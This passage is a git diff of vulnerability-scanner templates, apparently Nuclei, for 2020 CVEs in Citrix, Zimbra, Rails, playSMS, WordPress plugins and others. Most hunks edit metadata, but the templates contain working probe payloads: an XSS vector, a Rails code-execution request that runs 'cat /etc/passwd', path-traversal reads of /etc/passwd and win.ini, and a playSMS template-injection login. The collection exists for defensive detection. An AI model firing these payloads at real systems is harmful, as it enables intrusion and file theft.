     cvss-score: 4.3
@@ -41,3 +41,5 @@ requests:
           - "'\"><svg/onload=alert(document.domain)>"
         condition: and
         part: body
+
+# Enhanced by mp on 2022/08/15
diff --git a/cves/2020/CVE-2020-7796.yaml b/cves/2020/CVE-2020-7796.yaml
index 854dc09b6e..8c94eb0c98 100644
--- a/cves/2020/CVE-2020-7796.yaml
+++ b/cves/2020/CVE-2020-7796.yaml
@@ -4,10 +4,11 @@ info:
   name: Zimbra Collaboration Suite < 8.8.15 Patch 7 - Server-Side Request Forgery
   author: gy741
   severity: critical
-  description: "Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 is susceptible to server-side request forgery when WebEx zimlet is installed and zimlet JSP is enabled."
+  description: Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 is susceptible to server-side request forgery when WebEx zimlet is installed and zimlet JSP is enabled.
   reference:
     - https://www.adminxe.com/2183.html
     - https://nvd.nist.gov/vuln/detail/CVE-2020-7796
+    - https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P7
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
diff --git a/cves/2020/CVE-2020-7943.yaml b/cves/2020/CVE-2020-7943.yaml
index 0eedc7b036..538d5e8f66 100644
--- a/cves/2020/CVE-2020-7943.yaml
+++ b/cves/2020/CVE-2020-7943.yaml
@@ -1,20 +1,21 @@
 id: CVE-2020-7943
 
 info:
-  name: Puppet Server and PuppetDB sensitive information disclosure
+  name: Puppet Server/PuppetDB - Sensitive Information Disclosure
   author: c-sh0
   severity: high
-  description: Puppet Server and PuppetDB provide useful performance and debugging information via their metrics API endpoints, which may contain sensitive information
+  description: Puppet Server and PuppetDB provide useful performance and debugging information via their metrics API endpoints, which may contain sensitive information when left exposed.
   reference:
     - https://puppet.com/security/cve/CVE-2020-7943
-    - https://nvd.nist.gov/vuln/detail/CVE-2020-7943
     - https://tickets.puppetlabs.com/browse/PDB-4876
+    - https://puppet.com/security/cve/CVE-2020-7943/
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-7943
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2020-7943
     cwe-id: CWE-276
-  tags: cve,cve2020,puppet,exposure
+  tags: cve,cve2020,puppet,exposure,puppetdb
 
 requests:
   - method: GET
@@ -23,16 +24,18 @@ requests:
 
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
+
+      - type: word
+        part: body
+        words:
+          - "trapperkeeper"
 
       - type: word
         part: header
         words:
           - "application/json"
 
-      - type: word
-        part: body
-        words:
-          - "trapperkeeper"
+      - type: status
+        status:
+          - 200
+# Enhanced by mp on 2022/06/28
diff --git a/cves/2020/CVE-2020-7961.yaml b/cves/2020/CVE-2020-7961.yaml
index 1c32b37488..18f09a0e04 100644
--- a/cves/2020/CVE-2020-7961.yaml
+++ b/cves/2020/CVE-2020-7961.yaml
@@ -15,7 +15,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2020-7961
     cwe-id: CWE-502
-  tags: cve,cve2020,rce,liferay
+  tags: cve,cve2020,rce,liferay,kev
 
 requests:
   - raw:
diff --git a/cves/2020/CVE-2020-7980.yaml b/cves/2020/CVE-2020-7980.yaml
index 1e95539749..f801b300db 100644
--- a/cves/2020/CVE-2020-7980.yaml
+++ b/cves/2020/CVE-2020-7980.yaml
@@ -4,9 +4,12 @@ info:
   name: Satellian Intellian Aptus Web <= 1.24 - Remote Command Execution
   author: ritikchaddha
   severity: critical
-  description: "Intellian Aptus Web 1.24 allows remote attackers to execute arbitrary OS commands via the Q field within JSON data to the cgi-bin/libagent.cgi URI. NOTE: a valid sid cookie for a login to the intellian default account might be needed."
+  description: 'Intellian Aptus Web 1.24 allows remote attackers to execute arbitrary OS commands via the Q field within JSON data to the cgi-bin/libagent.cgi URI. NOTE: a valid sid cookie for a login to the intellian default account might be needed.'
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2020-7980
+    - https://sku11army.blogspot.com/2020/01/intellian-aptus-web-rce-intellian.html
+    - https://github.com/Xh4H/Satellian-CVE-2020-7980
+    - http://packetstormsecurity.com/files/156143/Satellian-1.12-Remote-Code-Execution.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -14,7 +17,7 @@ info:
     cwe-id: CWE-78
   metadata:
     shodan-query: http.title:"Intellian Aptus Web"
-  tags: satellian,rce,cve,cve2020,intellian,aptus
+  tags: cve,cve2020,intellian,aptus,packetstorm,satellian,rce
 
 requests:
   - raw:
diff --git a/cves/2020/CVE-2020-8115.yaml b/cves/2020/CVE-2020-8115.yaml
index aecdd7b672..34d721aabf 100644
--- a/cves/2020/CVE-2020-8115.yaml
+++ b/cves/2020/CVE-2020-8115.yaml
@@ -1,21 +1,21 @@
 id: CVE-2020-8115
-
 info:
-  name: Revive Adserver XSS
+  name: Revive Adserver <=5.0.3 - Cross-Site Scripting
   author: madrobot,dwisiswant0
   severity: medium
   description: |
-    A reflected XSS vulnerability has been discovered in the publicly accessible afr.php delivery script of Revive Adserver <= 5.0.3 by Jacopo Tediosi. There are currently no known exploits: the session identifier cannot be accessed as it is stored in an http-only cookie as of v3.2.2. On older versions, however, under specific circumstances, it could be possible to steal the session identifier and gain access to the admin interface. The query string sent to the www/delivery/afr.php script was printed back without proper escaping in a JavaScript context, allowing an attacker to execute arbitrary JS code on the browser of the victim.
+    Revive Adserver 5.0.3 and prior contains a reflected cross-site scripting vulnerability in the publicly accessible afr.php delivery script. In older versions, it is possible to steal the session identifier and gain access to the admin interface. The query string sent to the www/delivery/afr.php script is printed back without proper escaping, allowing an attacker to execute arbitrary JavaScript code on the browser of the victim.
   reference:
     - https://hackerone.com/reports/775693
     - https://www.revive-adserver.com/security/revive-sa-2020-001/
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-8115
+  remediation: There are currently no known exploits. As of 3.2.2, the session identifier cannot be accessed as it is stored in an http-only cookie.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2020-8115
     cwe-id: CWE-79
-  tags: cve,cve2020,xss
-
+  tags: cve,cve2020,xss,hackerone
 requests:
   - method: GET
     path:
@@ -28,4 +28,6 @@ requests:
       - type: regex
         part: body
         regex:
-          - (?mi)window\.location\.replace\(".*alert\(1337\)
\ No newline at end of file
+          - (?mi)window\.location\.replace\(".*alert\(1337\)
+
+# Enhanced by cs on 2022/09/07
diff --git a/cves/2020/CVE-2020-8163.yaml b/cves/2020/CVE-2020-8163.yaml
index ea177e8ae5..db20c9bebd 100644
--- a/cves/2020/CVE-2020-8163.yaml
+++ b/cves/2020/CVE-2020-8163.yaml
@@ -1,29 +1,38 @@
 id: CVE-2020-8163
 
 info:
-  name: Potential Remote Code Execution on Rails
+  name: Ruby on Rails <5.0.1 - Remote Code Execution
   author: tim_koopmans
   severity: high
-  description: Tests for ability to pass user parameters as local variables into partials
+  description: Ruby on Rails before version 5.0.1 is susceptible to remote code execution because it passes user parameters as local variables into partials.
   reference:
-    - https://correkt.horse/ruby/2020/08/22/CVE-2020-8163/
+    - https://web.archive.org/web/20201029105442/https://correkt.horse/ruby/2020/08/22/CVE-2020-8163/
+    - https://hackerone.com/reports/304805
+    - https://groups.google.com/g/rubyonrails-security/c/hWuKcHyoKh0
+    - https://lists.debian.org/debian-lts-announce/2020/07/msg00013.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-8163
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.8
     cve-id: CVE-2020-8163
     cwe-id: CWE-94
-  tags: cve,cve2020,rails,rce
+  tags: cve,cve2020,rails,rce,hackerone
 
 requests:
   - method: GET
     path:
       - "{{BaseURL}}?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23"
+
     matchers-condition: and
     matchers:
+
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
       - type: status
         status:
           - 200
-      - type: regex
-        regex:
-          - "root:.*:0:0:"
-        part: body
+
+# Enhanced by mp on 2022/06/28
diff --git a/cves/2020/CVE-2020-8191.yaml b/cves/2020/CVE-2020-8191.yaml
index e9319efe31..1387fcbba3 100644
--- a/cves/2020/CVE-2020-8191.yaml
+++ b/cves/2020/CVE-2020-8191.yaml
@@ -1,13 +1,14 @@
 id: CVE-2020-8191
 
 info:
-  name: Citrix ADC & NetScaler Gateway Reflected XSS
+  name: Citrix ADC/Gateway - Cross-Site Scripting
   author: dwisiswant0
   severity: medium
   description: |
-    Improper input validation in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows reflected Cross Site Scripting (XSS).
+    Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 contain a cross-site scripting vulnerability due to improper input validation.
   reference:
     - https://support.citrix.com/article/CTX276688
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-8191
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -39,4 +40,6 @@ requests:
       - type: word
         words:
           - "text/html"
-        part: header
\ No newline at end of file
+        part: header
+
+# Enhanced by mp on 2022/09/02
diff --git a/cves/2020/CVE-2020-8193.yaml b/cves/2020/CVE-2020-8193.yaml
index cf0ffd9078..90bf832497 100644
--- a/cves/2020/CVE-2020-8193.yaml
+++ b/cves/2020/CVE-2020-8193.yaml
@@ -1,20 +1,21 @@
 id: CVE-2020-8193
 
 info:
-  name: Citrix unauthenticated LFI
+  name: Citrix  - Local File Inclusion
   author: pdteam
   severity: medium
-  description: Improper access control in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7
-    allows unauthenticated access to certain URL endpoints.
+  description: Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 are vulnerable to local file inclusion because they allow unauthenticated access to certain URL endpoints.
   reference:
     - https://github.com/jas502n/CVE-2020-8193
     - http://packetstormsecurity.com/files/160047/Citrix-ADC-NetScaler-Local-File-Inclusion.html
+    - https://support.citrix.com/article/CTX276688
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-8193
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
     cvss-score: 6.5
     cve-id: CVE-2020-8193
     cwe-id: CWE-862
-  tags: cve,cve2020,citrix,lfi
+  tags: cve,cve2020,citrix,lfi,kev,packetstorm
 
 requests:
   - raw:
@@ -73,3 +74,5 @@ requests:
         regex:
           - "root:.*:0:0:"
         part: body
+
+# Enhanced by mp on 2022/07/22
diff --git a/cves/2020/CVE-2020-8209.yaml b/cves/2020/CVE-2020-8209.yaml
index f2a79dd821..67cf5b5a72 100644
--- a/cves/2020/CVE-2020-8209.yaml
+++ b/cves/2020/CVE-2020-8209.yaml
@@ -1,37 +1,42 @@
 id: CVE-2020-8209
 
 info:
-  name: Citrix XenMobile Server Path Traversal
+  name: Citrix XenMobile Server - Local File Inclusion
   author: dwisiswant0
   severity: high
   description: |
-    Improper access control in Citrix XenMobile Server 10.12 before RP2,
-    Citrix XenMobile Server 10.11 before RP4, Citrix XenMobile Server 10.10
-    before RP6 and Citrix XenMobile Server before 10.9 RP5 and leads to the ability to read arbitrary files.
-
+    Citrix XenMobile Server 10.12 before RP2, Citrix XenMobile Server 10.11 before RP4, Citrix XenMobile Server 10.10 before RP6, and Citrix XenMobile Server before 10.9 RP5 are susceptible to local file inclusion vulnerabilities.
     reference:
     - https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/
+    - https://support.citrix.com/article/CTX277457
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-8209
+  reference:
+    - https://support.citrix.com/article/CTX277457
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2020-8209
     cwe-id: CWE-22
-  tags: cve,cve2020,citrix,lfi
+  tags: cve,cve2020,citrix,lfi,xenmobile
 
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd"
+
     matchers-condition: and
     matchers:
       - type: regex
+        part: body
         regex:
           - "root:.*:0:0:"
-        part: body
+
       - type: word
+        part: header
         words:
           - "fileDownload=true"
           - "application/octet-stream"
           - "attachment;"
         condition: and
-        part: header
\ No newline at end of file
+
+# Enhanced by mp on 2022/06/28
diff --git a/cves/2020/CVE-2020-8497.yaml b/cves/2020/CVE-2020-8497.yaml
index 493888a700..ac9da84e0f 100644
--- a/cves/2020/CVE-2020-8497.yaml
+++ b/cves/2020/CVE-2020-8497.yaml
@@ -9,7 +9,7 @@ info:
     - https://k4m1ll0.com/cve-2020-8497.html
     - https://nvd.nist.gov/vuln/detail/CVE-2020-8497
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
     cve-id: CVE-2020-8497
     cwe-id: CWE-306
diff --git a/cves/2020/CVE-2020-8512.yaml b/cves/2020/CVE-2020-8512.yaml
index 8979cf3baa..5f20b27a10 100644
--- a/cves/2020/CVE-2020-8512.yaml
+++ b/cves/2020/CVE-2020-8512.yaml
@@ -1,19 +1,24 @@
 id: CVE-2020-8512
 
 info:
-  name: IceWarp WebMail XSS
+  name: IceWarp WebMail Server <=11.4.4.1 - Cross-Site Scripting
   author: pdteam,dwisiswant0
   severity: medium
-  description: In IceWarp Webmail Server through 11.4.4.1, there is XSS in the /webmail/ color parameter.
+  description: IceWarp Webmail Server through 11.4.4.1 contains a cross-site scripting vulnerability in the /webmail/ color parameter.
   reference:
     - https://www.exploit-db.com/exploits/47988
     - https://twitter.com/sagaryadav8742/status/1275170967527006208
+    - https://cxsecurity.com/issue/WLB-2020010205
+    - https://packetstormsecurity.com/files/156103/IceWarp-WebMail-11.4.4.1-Cross-Site-Scripting.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-8512
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2020-8512
     cwe-id: CWE-79
-  tags: cve,cve2020,xss,icewarp
+  metadata:
+    shodan-query: title:"icewarp"
+  tags: edb,packetstorm,cve,cve2020,xss,icewarp
 
 requests:
   - method: GET
@@ -32,3 +37,5 @@ requests:
         words:
           - "text/html"
         part: header
+
+# Enhanced by mp on 2022/09/02
diff --git a/cves/2020/CVE-2020-8515.yaml b/cves/2020/CVE-2020-8515.yaml
index b3bae566df..c834e6279b 100644
--- a/cves/2020/CVE-2020-8515.yaml
+++ b/cves/2020/CVE-2020-8515.yaml
@@ -4,18 +4,19 @@ info:
   name: DrayTek - Remote Code Execution
   author: pikpikcu
   severity: critical
-  description: "DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI."
-  remediation: This issue has been fixed in Vigor3900/2960/300B v1.5.1.
+  description: DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI.
   reference:
     - https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)
     - https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/
     - https://nvd.nist.gov/vuln/detail/CVE-2020-8515
+    - https://sku11army.blogspot.com/2020/01/draytek-unauthenticated-rce-in-draytek.html
+  remediation: This issue has been fixed in Vigor3900/2960/300B v1.5.1.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2020-8515
     cwe-id: CWE-78
-  tags: cve,cve2020,rce
+  tags: cve,cve2020,rce,kev
 
 requests:
   - raw:
diff --git a/cves/2020/CVE-2020-8641.yaml b/cves/2020/CVE-2020-8641.yaml
index e2828d1077..b9c02e7605 100644
--- a/cves/2020/CVE-2020-8641.yaml
+++ b/cves/2020/CVE-2020-8641.yaml
@@ -4,16 +4,17 @@ info:
   name: Lotus Core CMS 1.0.1 - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: Lotus Core CMS 1.0.1 allows authenticated Local File Inclusion of .php files via directory traversal in the index.php page_slug parameter.
+  description: Lotus Core CMS 1.0.1 allows authenticated local file inclusion of .php files via directory traversal in the index.php page_slug parameter.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2020-8641
     - https://cxsecurity.com/issue/WLB-2020010234
+    - https://www.exploit-db.com/exploits/47985
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-8641
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.8
     cve-id: CVE-2020-8641
     cwe-id: CWE-22
-  tags: cve,cve2020,lfi,lotus
+  tags: cve2020,lfi,lotus,cms,edb,cve
 
 requests:
   - method: GET
@@ -30,3 +31,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/28
diff --git a/cves/2020/CVE-2020-8644.yaml b/cves/2020/CVE-2020-8644.yaml
new file mode 100644
index 0000000000..ddeb6aaefd
--- /dev/null
+++ b/cves/2020/CVE-2020-8644.yaml
@@ -0,0 +1,58 @@
+id: CVE-2020-8644
+
+info:
+  name: playSMS <1.4.3 - Remote Code Execution
+  author: dbrwsky
+  severity: critical
+  description: PlaySMS before version 1.4.3 is susceptible to remote code execution because it double processes a server-side template.
+  reference:
+    - https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/
+    - https://playsms.org/2020/02/05/playsms-1-4-3-has-been-released/
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-8644
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2020-8644
+    cwe-id: CWE-74
+  tags: cve,cve2020,ssti,playsms,rce,unauth,kev
+
+requests:
+  - raw:
+      - |
+        GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{BaseURL}}
+
+      - |
+        POST /index.php?app=main&inc=core_auth&route=login&op=login HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{BaseURL}}
+        Content-Type: application/x-www-form-urlencoded
+
+        X-CSRF-Token={{csrf}}&username=%7B%7B%60echo%20%27CVE-2020-8644%27%20%7C%20rev%60%7D%7D&password=
+
+    cookie-reuse: true
+    redirects: true
+    max-redirects: 2
+    extractors:
+      - type: xpath
+        name: csrf
+        part: body
+        attribute: value
+        internal: true
+        xpath:
+          - /html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - '4468-0202-EVC'
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/07/07
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-8654.yaml b/cves/2020/CVE-2020-8654.yaml
new file mode 100644
index 0000000000..2e8ea44414
--- /dev/null
+++ b/cves/2020/CVE-2020-8654.yaml
@@ -0,0 +1,47 @@
+id: CVE-2020-8654
+
+info:
+  name: EyesOfNetwork 5.3 - Authenticated RCE
+  author: praetorian-thendrickson
+  severity: high
+  description: EyesOfNetwork version 5.1-5.3 is vulnerable to multiple exploits. Version 5.3 is vulnerable to CVE-2020-8654 (authenticated rce), CVE-2020-8655 (privesc), CVE-2020-8656 (SQLi - API version before 2.4.2), and 2020-8657 (hardcoded api key). Versions 5.1-5.3 are vulnerable to CVE-2020-9465 (SQLi).
+  reference:
+    - https://github.com/h4knet/eonrce
+    - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/eyesofnetwork_autodiscovery_rce.rb
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-8657
+    - https://github.com/EyesOfNetworkCommunity/eonweb/issues/50
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2020-8654
+    cwe-id: CWE-78
+  tags: cisa,eyesofnetwork,rce,authenticated,msf,cve,cve2020
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/css/eonweb.css"
+
+    extractors:
+      - type: regex
+        name: version
+        internal: true
+        part: body
+        group: 1
+        regex:
+          - '# VERSION : ([0-9.]+)'
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - compare_versions(version, '< 5.4', '>= 5.1')
+
+      - type: word
+        part: body
+        words:
+          - "EyesOfNetwork"
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2020/CVE-2020-8771.yaml b/cves/2020/CVE-2020-8771.yaml
index 5e2355f12f..98b42b98a1 100644
--- a/cves/2020/CVE-2020-8771.yaml
+++ b/cves/2020/CVE-2020-8771.yaml
@@ -4,10 +4,12 @@ info:
   name: WordPress Time Capsule < 1.21.16 - Authentication Bypass
   author: princechaddha
   severity: critical
-  description: "WordPress Time Capsule plugin before 1.21.16 for WordPress has an authentication bypass. Any request containing IWP_JSON_PREFIX causes the client to be logged in as the first account on the list of administrator accounts."
+  description: WordPress Time Capsule plugin before 1.21.16 for WordPress has an authentication bypass. Any request containing IWP_JSON_PREFIX causes the client to be logged in as the first account on the list of administrator accounts.
   reference:
     - https://github.com/SECFORCE/WPTimeCapsulePOC
     - https://nvd.nist.gov/vuln/detail/CVE-2020-8771
+    - https://wpvulndb.com/vulnerabilities/10010
+    - https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
diff --git a/vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml b/cves/2020/CVE-2020-8772.yaml
similarity index 64%
rename from vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml
rename to cves/2020/CVE-2020-8772.yaml
index df56152a95..550eaa452f 100644
--- a/vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml
+++ b/cves/2020/CVE-2020-8772.yaml
@@ -1,19 +1,27 @@
-id: wordpress-infinitewp-auth-bypass
+id: CVE-2020-8772
 
 info:
-  name: WordPress InfiniteWP Client Authentication Bypass
-  author: princechaddha
+  name: WordPress InfiniteWP Client < 1.9.4.5 - Authentication Bypass
+  author: princechaddha,scent2d
   severity: critical
-  description: InfiniteWP Client plugin versions 1.9.4.4 or earlier contain a critical authentication bypass vulnerability. InfiniteWP Client is a plugin that, when installed on a WordPress site, allows a site owner
-    to manage unlimited WordPress sites from their own server.
+  description: |
+    The InfiniteWP Client plugin before 1.9.4.5 for WordPress has a missing
+    authorization check in iwp_mmb_set_request in init.php. Any attacker who
+    knows the username of an administrator can log in.
   reference:
-    - https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/
-    - https://wordpress.org/plugins/iwp-client/#developers
-  classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 9.8
+    - https://wpscan.com/vulnerability/10011
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-8772
+    - https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/
+    - https://wpvulndb.com/vulnerabilities/10011
   remediation: Upgrade to InfiniteWP Client 1.9.4.5 or higher.
-  tags: wordpress,auth-bypass,wp-plugin
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2020-8772
+    cwe-id: CWE-862
+  metadata:
+    verified: "true"
+  tags: wpscan,cve,cve2020,wordpress,wp-plugin,wp,infinitewp,auth-bypass
 
 requests:
   - raw:
@@ -52,9 +60,9 @@ requests:
     matchers-condition: and
     matchers:
       - type: word
+        part: header
         words:
           - "wordpress_logged_in"
-        part: header
 
       - type: word
         words:
@@ -64,5 +72,3 @@ requests:
       - type: status
         status:
           - 200
-
-# Enhanced by mp on 2022/03/21
diff --git a/cves/2020/CVE-2020-8813.yaml b/cves/2020/CVE-2020-8813.yaml
index b89af7a5d5..2ca5f6ff4f 100644
--- a/cves/2020/CVE-2020-8813.yaml
+++ b/cves/2020/CVE-2020-8813.yaml
@@ -1,12 +1,16 @@
 id: CVE-2020-8813
 
 info:
-  name: Cacti v1.2.8 - Unauthenticated Remote Code Execution
+  name: Cacti v1.2.8 - Remote Code Execution
   author: gy741
   severity: high
-  description: This vulnerability could be exploited without authentication if Cacti is enabling "Guest Realtime Graphs" privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability.
+  description: Cacti v1.2.8 is susceptible to remote code execution. This vulnerability could be exploited without authentication if "Guest Realtime Graphs" privileges are enabled.
   reference:
     - https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/
+    - https://github.com/Cacti/cacti/releases
+    - https://gist.github.com/mhaskar/ebe6b74c32fd0f7e1eedf1aabfd44129
+    - https://drive.google.com/file/d/1A8hxTyk_NgSp04zPX-23nPbsSDeyDFio/view
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-8813
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.8
@@ -26,3 +30,5 @@ requests:
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
+
+# Enhanced by mp on 2022/06/27
diff --git a/cves/2020/CVE-2020-8982.yaml b/cves/2020/CVE-2020-8982.yaml
index 6a3e737c04..d80ddfab2a 100644
--- a/cves/2020/CVE-2020-8982.yaml
+++ b/cves/2020/CVE-2020-8982.yaml
@@ -1,12 +1,15 @@
 id: CVE-2020-8982
 
 info:
-  name: Citrix ShareFile StorageZones Unauthenticated Arbitrary File Read
+  name: Citrix ShareFile StorageZones <=5.10.x - Arbitrary File Read
   author: dwisiswant0
   severity: high
-  description: An unauthenticated arbitrary file read issue exists in all versions of Citrix ShareFile StorageZones (aka storage zones) Controller, including the most recent 5.10.x releases as of May 2020.
+  description: Citrix ShareFile StorageZones (aka storage zones) Controller versions through at least 5.10.x are susceptible to an unauthenticated arbitrary file read vulnerability.
   reference:
     - https://support.citrix.com/article/CTX269106
+    - https://drive.google.com/file/d/1Izd5MF_HHuq8YSwAyJLBErWL_nbe6f9v/view
+    - https://www.linkedin.com/posts/jonas-hansen-2a2606b_citrix-sharefile-storage-zones-controller-activity-6663432907455025152-8_w6/
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-8982
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
@@ -18,15 +21,20 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri"
+
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
+
       - type: word
+        part: body
         words:
           - "bit app support"
           - "fonts"
           - "extensions"
         condition: and
-        part: body
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/06/27
diff --git a/cves/2020/CVE-2020-9036.yaml b/cves/2020/CVE-2020-9036.yaml
index 813e7d55ea..b7438ecc2d 100644
--- a/cves/2020/CVE-2020-9036.yaml
+++ b/cves/2020/CVE-2020-9036.yaml
@@ -1,10 +1,10 @@
 id: CVE-2020-9036
 
 info:
-  name: Jeedom through 4.0.38 allows XSS
+  name: Jeedom <=4.0.38 - Cross-Site Scripting
   author: pikpikcu
   severity: medium
-  description: Jeedom through 4.0.38 allows XSS.
+  description: Jeedom through 4.0.38 contains a cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
   reference:
     - https://sysdream.com/news/lab/2020-08-05-cve-2020-9036-jeedom-xss-leading-to-remote-code-execution/
     - https://nvd.nist.gov/vuln/detail/CVE-2020-9036
@@ -35,3 +35,5 @@ requests:
         part: header
         words:
           - text/html
+
+# Enhanced by mp on 2022/09/02
diff --git a/cves/2020/CVE-2020-9043.yaml b/cves/2020/CVE-2020-9043.yaml
new file mode 100644
index 0000000000..e37851c701
